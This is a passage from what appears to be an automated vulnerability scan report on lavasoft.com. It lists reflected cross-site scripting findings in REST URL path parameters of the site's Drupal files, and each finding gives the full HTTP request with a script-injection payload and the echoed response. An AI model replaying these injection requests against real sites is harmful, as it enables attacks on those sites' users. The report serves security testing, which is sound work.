<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/date/date.css95ae9'><script>alert(1)</script>7c6187b617e'>
...[SNIP]...

1.247. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/css/fivestar.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/css/fivestar.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b330d'><script>alert(1)</script>bff079bfb71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoftb330d'><script>alert(1)</script>bff079bfb71/sites/all/modules/fivestar/css/fivestar.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:24 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:24 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10647
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoftb330d'><script>alert(1)</script>bff079bfb71/sites/all/modules/fivestar/css/fivestar.css?w'>
...[SNIP]...

1.248. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/css/fivestar.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/css/fivestar.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1140'><script>alert(1)</script>fcee36dbee2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sitesd1140'><script>alert(1)</script>fcee36dbee2/all/modules/fivestar/css/fivestar.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:37 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18268
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sitesd1140'><script>alert(1)</script>fcee36dbee2/all/modules/fivestar/css/fivestar.css'>
...[SNIP]...

1.249. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/css/fivestar.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/css/fivestar.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e88c2'><script>alert(1)</script>700ae535ace was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/alle88c2'><script>alert(1)</script>700ae535ace/modules/fivestar/css/fivestar.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18230
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/alle88c2'><script>alert(1)</script>700ae535ace/modules/fivestar/css/fivestar.css'>
...[SNIP]...

1.250. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/css/fivestar.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/css/fivestar.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57c7c'><script>alert(1)</script>8e290d4d4b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules57c7c'><script>alert(1)</script>8e290d4d4b1/fivestar/css/fivestar.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18230
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules57c7c'><script>alert(1)</script>8e290d4d4b1/fivestar/css/fivestar.css'>
...[SNIP]...

1.251. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/css/fivestar.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/css/fivestar.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bb6be'><script>alert(1)</script>8d96e95fe62 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/fivestarbb6be'><script>alert(1)</script>8d96e95fe62/css/fivestar.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18230
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/fivestarbb6be'><script>alert(1)</script>8d96e95fe62/css/fivestar.css'>
...[SNIP]...

1.252. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/css/fivestar.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/css/fivestar.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7eacf'><script>alert(1)</script>d48d4e06152 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/fivestar/css7eacf'><script>alert(1)</script>d48d4e06152/fivestar.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18230
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/fivestar/css7eacf'><script>alert(1)</script>d48d4e06152/fivestar.css'>
...[SNIP]...

1.253. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/css/fivestar.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/css/fivestar.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57d66'><script>alert(1)</script>76b8e23b5fc was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/fivestar/css/fivestar.css57d66'><script>alert(1)</script>76b8e23b5fc?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18230
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/fivestar/css/fivestar.css57d66'><script>alert(1)</script>76b8e23b5fc'>
...[SNIP]...

1.254. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/js/fivestar.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/js/fivestar.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 67dd9'><script>alert(1)</script>e6672341f07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft67dd9'><script>alert(1)</script>e6672341f07/sites/all/modules/fivestar/js/fivestar.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:24 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:24 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10645
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft67dd9'><script>alert(1)</script>e6672341f07/sites/all/modules/fivestar/js/fivestar.js?w'>
...[SNIP]...

1.255. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/js/fivestar.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/js/fivestar.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45272'><script>alert(1)</script>3dbce6c32cb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites45272'><script>alert(1)</script>3dbce6c32cb/all/modules/fivestar/js/fivestar.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:37 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18264
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites45272'><script>alert(1)</script>3dbce6c32cb/all/modules/fivestar/js/fivestar.js'>
...[SNIP]...

1.256. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/js/fivestar.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/js/fivestar.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fa182'><script>alert(1)</script>389433e4b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/allfa182'><script>alert(1)</script>389433e4b7/modules/fivestar/js/fivestar.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18224
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/allfa182'><script>alert(1)</script>389433e4b7/modules/fivestar/js/fivestar.js'>
...[SNIP]...

1.257. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/js/fivestar.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/js/fivestar.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6f8be'><script>alert(1)</script>ecb418fd4bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules6f8be'><script>alert(1)</script>ecb418fd4bc/fivestar/js/fivestar.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18226
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules6f8be'><script>alert(1)</script>ecb418fd4bc/fivestar/js/fivestar.js'>
...[SNIP]...

1.258. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/js/fivestar.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/js/fivestar.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6ed9e'><script>alert(1)</script>d07b7742900 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/fivestar6ed9e'><script>alert(1)</script>d07b7742900/js/fivestar.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
